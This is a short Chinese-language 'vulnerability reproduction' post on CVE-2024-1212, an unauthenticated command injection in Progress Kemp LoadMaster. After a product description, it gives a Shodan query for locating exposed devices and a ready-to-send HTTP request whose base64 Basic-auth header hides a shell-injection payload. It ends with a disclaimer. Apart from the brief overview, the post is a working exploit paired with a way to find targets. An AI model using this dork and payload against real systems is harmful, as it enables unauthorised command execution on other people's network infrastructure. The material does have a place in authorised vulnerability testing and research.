【漏洞复现】Progress Kemp LoadMaster 命令注入漏洞(CVE-2024-1212)

0x01 产品简介

Progress Kemp LoadMaster是一款高性能的应用交付控制器，具有可扩展性，支持实体硬件和虚拟机的负载均衡。它提供了当今应用服务所需的各种功能，包括深度用户验证、资安防护（如WAF/IPS/DDoS防护）以及零信任架构服务。这款控制器旨在为各种规模的企业和单位提供出色的负载平衡和应用程序体验。

0x02 漏洞概述

Progress Kemp LoadMaster存在命令注入漏洞，未经身份验证的远程攻击者可以通过 LoadMaster 管理界面访问系统，从而实现任意系统命令执行。

0x03 测绘语句

shodan：html:"LoadMaster"

0x04 漏洞复现

漏洞复现：

GET /access/set?param=enableapi&value=1 HTTP/1.1

Host:

Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=

0x05 影响范围

LoadMaster > 7.2.48.1

0x06 免责声明

本文所涉及的任何技术、信息或工具，仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响，均由使用者个人承担责任，与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明，并承诺遵守相关法律法规和道德规范。